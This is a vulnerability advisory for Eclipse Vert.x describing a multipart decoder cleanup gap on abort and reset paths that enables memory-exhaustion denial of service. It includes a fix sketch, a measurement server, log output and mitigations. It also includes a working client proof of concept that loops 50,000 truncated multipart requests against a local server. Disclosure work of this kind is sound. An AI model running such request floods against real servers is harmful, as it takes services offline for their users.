[Eclipse Vert.x] Multipart decoder cleanup missing on abort/reset paths may lead to DoS

Published on behalf of @jihunkim

Basic information

Project name: Eclipse Vert.x

Project id: rt.vertx

What are the affected versions?

  • 5.1.0-SNAPSHOT (master)
  • 5.0.x
  • 4.x
  • 3.9.x

Details of the issue

A resource-release gap exists in Vert.x multipart request handling: the multipart decoder is cleaned up on normal completion paths, but not consistently on abort/reset/exception/close paths.

Vert.x relies on Netty’s multipart decoder (HttpPostRequestDecoder), whose usage contract requires calling destroy() to release decoder-associated resources. In the affected abort/reset paths, this teardown is not consistently performed, so accumulated parser state can be retained longer than intended.
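The consequence of skipping destroy() can be illustrated with a minimal, self-contained sketch. The `FakeDecoder` class below is a hypothetical stand-in for Netty's HttpPostRequestDecoder, used only to model the requirement that every terminal path must release decoder state:

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical stand-in for Netty's HttpPostRequestDecoder: it accumulates
// per-part state that is only released when destroy() is called.
class FakeDecoder {
  final List<byte[]> partialData = new ArrayList<>();
  boolean destroyed;

  void offer(byte[] chunk) { partialData.add(chunk); } // parser retains chunk state
  void destroy() { partialData.clear(); destroyed = true; }
}

public class DecoderContract {
  public static void main(String[] args) {
    // Normal completion path: decoder is destroyed, state is released.
    FakeDecoder ok = new FakeDecoder();
    ok.offer(new byte[1024]);
    ok.destroy(); // analogous to the cleanup done in endDecode()

    // Abort path without cleanup: state stays referenced by the request object.
    FakeDecoder leaked = new FakeDecoder();
    leaked.offer(new byte[1024]);
    // no destroy() -> partialData still retained

    System.out.println(ok.destroyed + " " + ok.partialData.size());        // true 0
    System.out.println(leaked.destroyed + " " + leaked.partialData.size()); // false 1
  }
}
```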

An attacker can repeatedly send incomplete multipart/form-data requests and terminate them before completion (HTTP/1.x connection close or HTTP/2/3 stream reset), causing sustained memory pressure and GC overhead. Under constrained memory this can lead to OutOfMemoryError, resulting in remote denial of service (availability impact).

Practical DoS impact is amplified when each aborted request accumulates more decoder state before termination, for example by sending many valid multipart fields/parts prior to abort. This increases per-request parser state retained around terminal paths and raises GC/memory pressure under repeated concurrent traffic.

The issue is reachable on endpoints that enable multipart parsing (e.g., setExpectMultipart(true) / upload handling), and does not require authentication when such endpoints are publicly exposed.

Relevant code paths

Http1ServerRequest.handleException(...) should release the multipart decoder on the exception path (normal completion already does this in endDecode()):

// vertx-core/src/main/java/io/vertx/core/http/impl/http1/Http1ServerRequest.java
void handleException(Throwable t) {
  ...
  synchronized (conn) {
    if (!isEnded()) {
      handler = eventHandler;
      if (decoder != null) {
        upload = decoder.currentPartialHttpData();
        decoder.destroy(); // cleanup on exception path
        decoder = null;    // clear decoder reference
      }
    }
    ...
  }
  ...
}

The same cleanup pattern should also be applied in the following methods of HttpServerRequestImpl.java:

  • handleException(Throwable cause)
  • handleReset(long errorCode)
  • handleClosed(Void v)
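One way to guarantee the teardown on every terminal path is a single idempotent helper invoked from each handler. The sketch below is self-contained and hypothetical (the names `releaseDecoder` and `StubDecoder` are illustrative, not Vert.x API); it shows the guard that makes repeated invocation from the end/exception/reset/close paths safe:

```java
import java.util.concurrent.atomic.AtomicInteger;
import java.util.concurrent.atomic.AtomicReference;

// Hypothetical model of a request that owns a multipart decoder and must
// release it exactly once, no matter which terminal event fires first.
public class TerminalCleanup {
  static class StubDecoder {
    static final AtomicInteger DESTROY_CALLS = new AtomicInteger();
    void destroy() { DESTROY_CALLS.incrementAndGet(); }
  }

  private final AtomicReference<StubDecoder> decoder =
      new AtomicReference<>(new StubDecoder());

  // Idempotent teardown: getAndSet(null) guarantees destroy() runs at most
  // once even if multiple terminal callbacks fire for the same request.
  private void releaseDecoder() {
    StubDecoder d = decoder.getAndSet(null);
    if (d != null) {
      d.destroy();
    }
  }

  void handleEnd()                  { releaseDecoder(); }
  void handleException(Throwable t) { releaseDecoder(); }
  void handleReset(long errorCode)  { releaseDecoder(); }
  void handleClosed()               { releaseDecoder(); }

  public static void main(String[] args) {
    TerminalCleanup req = new TerminalCleanup();
    req.handleException(new RuntimeException("aborted"));
    req.handleClosed(); // close often follows an exception; must be a no-op here
    System.out.println(StubDecoder.DESTROY_CALLS.get()); // prints 1
  }
}
```

In the real code base the equivalent guard is the `decoder = null` assignment under the connection lock, as shown in the handleException() snippet above.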

Steps to reproduce

  1. Run a Vert.x HTTP server with a multipart endpoint that calls setExpectMultipart(true):
import io.vertx.core.Vertx;
import io.vertx.core.http.HttpMethod;

public class MultipartAbortServer {
  public static void main(String[] args) {
    Vertx.vertx().createHttpServer().requestHandler(req -> {
      if (req.method() == HttpMethod.POST && "/upload".equals(req.path())) {
        req.setExpectMultipart(true);
        req.uploadHandler(upload -> upload.handler(buf -> {}));
        req.handler(buf -> {});
        req.exceptionHandler(err -> {});
        req.endHandler(v -> req.response().end("ok"));
      } else {
        req.response().end("POST /upload");
      }
    }).listen(8080, "127.0.0.1");
  }
}
  2. Send many incomplete multipart/form-data requests and close the connection before the final boundary (repeat in a loop).
import java.io.OutputStream;
import java.net.Socket;
import java.nio.charset.StandardCharsets;

public class MultipartAbortClient {
  public static void main(String[] args) throws Exception {
    for (int i = 0; i < 50000; i++) {
      String boundary = "poc" + i;
      try (Socket s = new Socket("127.0.0.1", 8080)) {
        OutputStream out = s.getOutputStream();
        out.write((
          "POST /upload HTTP/1.1\r\n" +
          "Host: 127.0.0.1:8080\r\n" +
          "Connection: close\r\n" +
          "Content-Type: multipart/form-data; boundary=" + boundary + "\r\n" +
          "Content-Length: 999999\r\n\r\n" +
          "--" + boundary + "\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"a.txt\"\r\n" +
          "Content-Type: text/plain\r\n\r\n" +
          "AAAAAA"
        ).getBytes(StandardCharsets.US_ASCII));
        out.flush();
        // close early without sending "--" + boundary + "--"
      } catch (Exception ignore) {
      }
    }
  }
}
Actual PoC code used in validation:
package poc.f2;

import io.netty.handler.codec.http.multipart.HttpPostRequestDecoder;
import io.vertx.core.Vertx;
import io.vertx.core.http.HttpMethod;
import io.vertx.core.http.HttpServerRequest;
import io.vertx.core.http.HttpServerOptions;

import java.lang.ref.ReferenceQueue;
import java.lang.ref.WeakReference;
import java.lang.reflect.Field;
import java.time.Instant;
import java.util.IdentityHashMap;
import java.util.Locale;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.atomic.AtomicLong;
import java.util.concurrent.atomic.LongAdder;

/**
 * Minimal PoC server that logs only decoder residuals.
 */
public class F2PocServerCore {

  private static final int PORT = 8080;
  private static final int LOG_INTERVAL_SEC = 1;
  private static final long NS_PER_MS = 1_000_000L;

  private static final AtomicLong REQ_SEQ = new AtomicLong();
  private static final ReferenceQueue<HttpPostRequestDecoder> DECODER_GC_QUEUE = new ReferenceQueue<>();
  private static final ConcurrentHashMap<Integer, TrackedDecoderRef> DECODER_REFS = new ConcurrentHashMap<>();
  private static final ConcurrentHashMap<Long, Integer> REQ_TO_DECODER = new ConcurrentHashMap<>();

  private static final class TrackedDecoderRef extends WeakReference<HttpPostRequestDecoder> {
    final int decoderId;
    final long requestId;
    final long createdNanos;
    volatile long terminalNanos;
    volatile String lastEvent;

    TrackedDecoderRef(HttpPostRequestDecoder referent,
                      int decoderId,
                      long requestId,
                      long createdNanos,
                      ReferenceQueue<HttpPostRequestDecoder> queue) {
      super(referent, queue);
      this.decoderId = decoderId;
      this.requestId = requestId;
      this.createdNanos = createdNanos;
      this.lastEvent = "created";
    }
  }

  public static void main(String[] args) {
    Vertx vertx = Vertx.vertx();
    LongAdder req = new LongAdder();
    LongAdder ended = new LongAdder();
    LongAdder exceptions = new LongAdder();

    HttpServerOptions options = new HttpServerOptions()
      .setHost("127.0.0.1")
      .setPort(PORT);

    vertx.createHttpServer(options).requestHandler(request -> {
      if (request.method() == HttpMethod.POST && "/upload".equals(request.path())) {
        long reqId = REQ_SEQ.incrementAndGet();
        req.increment();

        request.exceptionHandler(err -> {
          exceptions.increment();
          trackDecoder(reqId, request, "exception", true);
        });

        request.setExpectMultipart(true);
        trackDecoder(reqId, request, "afterSetExpectMultipart", false);

        request.uploadHandler(upload -> upload.handler(buf -> {
          // drain
        }));
        request.handler(buf -> {
          // drain
        });
        request.endHandler(v -> {
          ended.increment();
          trackDecoder(reqId, request, "end", true);
          request.response().end("ok");
        });
      } else if ("/stats".equals(request.path())) {
        DecoderStats s = collectDecoderStats();
        request.response().putHeader("content-type", "text/plain").end(
          "decoderLive=" + s.live + "\n" +
            "decoderTerminalLive=" + s.terminalLive + "\n" +
            "decoderTerminalLiveOver10s=" + s.terminalLiveOver10s + "\n" +
            "decoderTerminalLiveOver30s=" + s.terminalLiveOver30s + "\n"
        );
      } else {
        request.response().end("POST /upload, GET /stats");
      }
    }).listen(ar -> {
      if (ar.succeeded()) {
        System.out.println("F2PocServerCore listening on http://127.0.0.1:" + PORT);
      } else {
        ar.cause().printStackTrace();
      }
    });

    vertx.setPeriodic(LOG_INTERVAL_SEC * 1000L, timer -> {
      long reqNow = req.sum();
      long endedNow = ended.sum();
      long pending = Math.max(0, reqNow - endedNow);
      DecoderStats s = collectDecoderStats();
      System.out.printf(
        Locale.ROOT,
        "ts=%s req=%d ended=%d pending=%d reqExceptions=%d decoderLive=%d decoderTerminalLive=%d decoderTerminalLiveOver10s=%d decoderTerminalLiveOver30s=%d%n",
        Instant.now(),
        reqNow,
        endedNow,
        pending,
        exceptions.sum(),
        s.live,
        s.terminalLive,
        s.terminalLiveOver10s,
        s.terminalLiveOver30s
      );
    });
  }

  private static final class DecoderStats {
    final int live;
    final int terminalLive;
    final int terminalLiveOver10s;
    final int terminalLiveOver30s;

    DecoderStats(int live, int terminalLive, int terminalLiveOver10s, int terminalLiveOver30s) {
      this.live = live;
      this.terminalLive = terminalLive;
      this.terminalLiveOver10s = terminalLiveOver10s;
      this.terminalLiveOver30s = terminalLiveOver30s;
    }
  }

  private static DecoderStats collectDecoderStats() {
    drainDecoderGcQueue();
    long now = System.nanoTime();
    int live = 0;
    int terminalLive = 0;
    int terminalLiveOver10s = 0;
    int terminalLiveOver30s = 0;
    for (TrackedDecoderRef ref : DECODER_REFS.values()) {
      if (ref.get() == null) {
        continue;
      }
      live++;
      if (ref.terminalNanos > 0) {
        terminalLive++;
        long ageMs = (now - ref.terminalNanos) / NS_PER_MS;
        if (ageMs >= 10_000L) {
          terminalLiveOver10s++;
        }
        if (ageMs >= 30_000L) {
          terminalLiveOver30s++;
        }
      }
    }
    return new DecoderStats(live, terminalLive, terminalLiveOver10s, terminalLiveOver30s);
  }

  private static void trackDecoder(long reqId, HttpServerRequest req, String event, boolean terminal) {
    long now = System.nanoTime();
    HttpPostRequestDecoder decoder = extractDecoder(req);
    if (decoder == null) {
      if (terminal) {
        Integer decoderId = REQ_TO_DECODER.get(reqId);
        if (decoderId != null) {
          TrackedDecoderRef tracked = DECODER_REFS.get(decoderId);
          if (tracked != null) {
            tracked.terminalNanos = now;
            tracked.lastEvent = event + ":decoderDetached";
          }
        }
      }
      return;
    }

    int decoderId = System.identityHashCode(decoder);
    TrackedDecoderRef ref = DECODER_REFS.get(decoderId);
    if (ref == null) {
      TrackedDecoderRef created = new TrackedDecoderRef(decoder, decoderId, reqId, now, DECODER_GC_QUEUE);
      TrackedDecoderRef prev = DECODER_REFS.putIfAbsent(decoderId, created);
      ref = prev != null ? prev : created;
    }
    REQ_TO_DECODER.putIfAbsent(reqId, decoderId);
    ref.lastEvent = event;
    if (terminal) {
      ref.terminalNanos = now;
    }
  }

  private static HttpPostRequestDecoder extractDecoder(HttpServerRequest req) {
    return extractDecoderRecursive(req, new IdentityHashMap<>(), 0);
  }

  private static HttpPostRequestDecoder extractDecoderRecursive(Object obj,
                                                                IdentityHashMap<Object, Boolean> visited,
                                                                int depth) {
    if (obj == null || depth > 8 || visited.containsKey(obj)) {
      return null;
    }
    visited.put(obj, Boolean.TRUE);

    Class<?> type = obj.getClass();
    for (Class<?> c = type; c != null; c = c.getSuperclass()) {
      for (Field field : c.getDeclaredFields()) {
        String name = field.getName();
        if (!"decoder".equals(name) && !"postRequestDecoder".equals(name)) {
          continue;
        }
        Object value = readField(field, obj);
        if (value instanceof HttpPostRequestDecoder hprd) {
          return hprd;
        }
      }
    }

    for (Class<?> c = type; c != null; c = c.getSuperclass()) {
      for (Field field : c.getDeclaredFields()) {
        Class<?> fieldType = field.getType();
        String name = field.getName().toLowerCase(Locale.ROOT);
        boolean follow =
          HttpServerRequest.class.isAssignableFrom(fieldType) ||
            "delegate".equals(name) ||
            "request".equals(name) ||
            "req".equals(name) ||
            name.contains("request");
        if (!follow) {
          continue;
        }
        Object nested = readField(field, obj);
        HttpPostRequestDecoder decoder = extractDecoderRecursive(nested, visited, depth + 1);
        if (decoder != null) {
          return decoder;
        }
      }
    }

    return null;
  }

  private static Object readField(Field field, Object target) {
    try {
      field.setAccessible(true);
      return field.get(target);
    } catch (Throwable ignore) {
      return null;
    }
  }

  private static void drainDecoderGcQueue() {
    TrackedDecoderRef ref;
    while ((ref = (TrackedDecoderRef) DECODER_GC_QUEUE.poll()) != null) {
      DECODER_REFS.remove(ref.decoderId, ref);
      REQ_TO_DECODER.remove(ref.requestId, ref.decoderId);
    }
  }
}
ts=2026-02-27T19:14:05.982592Z req=6353 ended=0 pending=6353 reqExceptions=6353 decoderLive=6353 decoderTerminalLive=6353 decoderTerminalLiveOver10s=0 decoderTerminalLiveOver30s=0
ts=2026-02-27T19:14:15.984176Z req=6353 ended=0 pending=6353 reqExceptions=6353 decoderLive=6353 decoderTerminalLive=6353 decoderTerminalLiveOver10s=6353 decoderTerminalLiveOver30s=0
ts=2026-02-27T19:14:30.980996Z req=6353 ended=0 pending=6353 reqExceptions=6353 decoderLive=6353 decoderTerminalLive=6353 decoderTerminalLiveOver10s=6353 decoderTerminalLiveOver30s=0
ts=2026-02-27T19:14:34.985775Z req=6353 ended=0 pending=6353 reqExceptions=6353 decoderLive=6353 decoderTerminalLive=6353 decoderTerminalLiveOver10s=6353 decoderTerminalLiveOver30s=3479
ts=2026-02-27T19:14:35.981470Z req=6353 ended=0 pending=6353 reqExceptions=6353 decoderLive=6353 decoderTerminalLive=6353 decoderTerminalLiveOver10s=6353 decoderTerminalLiveOver30s=6353
ts=2026-02-27T19:14:39.983130Z req=6353 ended=0 pending=6353 reqExceptions=6353 decoderLive=6353 decoderTerminalLive=6353 decoderTerminalLiveOver10s=6353 decoderTerminalLiveOver30s=6353

Do you know any mitigations of the issue?

Partial mitigations are available, but a code fix is still required.

  • Restrict multipart upload endpoints (authentication/authorization before upload parsing).
  • Apply strict rate limiting and connection limits at edge/WAF/reverse proxy.
  • Use short read/idle timeouts so incomplete uploads are closed quickly.
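For the timeout mitigation, Vert.x exposes an idle timeout on HttpServerOptions; a minimal configuration sketch (the 5-second value is illustrative and should be tuned per deployment):

```java
import io.vertx.core.Vertx;
import io.vertx.core.http.HttpServerOptions;

import java.util.concurrent.TimeUnit;

// Close connections that go quiet mid-upload, so aborted multipart requests
// reach a terminal path (and their state becomes collectable) quickly.
public class TimeoutMitigation {
  public static void main(String[] args) {
    HttpServerOptions options = new HttpServerOptions()
      .setIdleTimeout(5)                      // illustrative value
      .setIdleTimeoutUnit(TimeUnit.SECONDS);
    Vertx.vertx().createHttpServer(options)
      .requestHandler(req -> req.response().end("ok"))
      .listen(8080, "127.0.0.1");
  }
}
```

Note this only shortens the retention window per connection; it does not close the underlying cleanup gap.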
Edited by Lukas Pühringer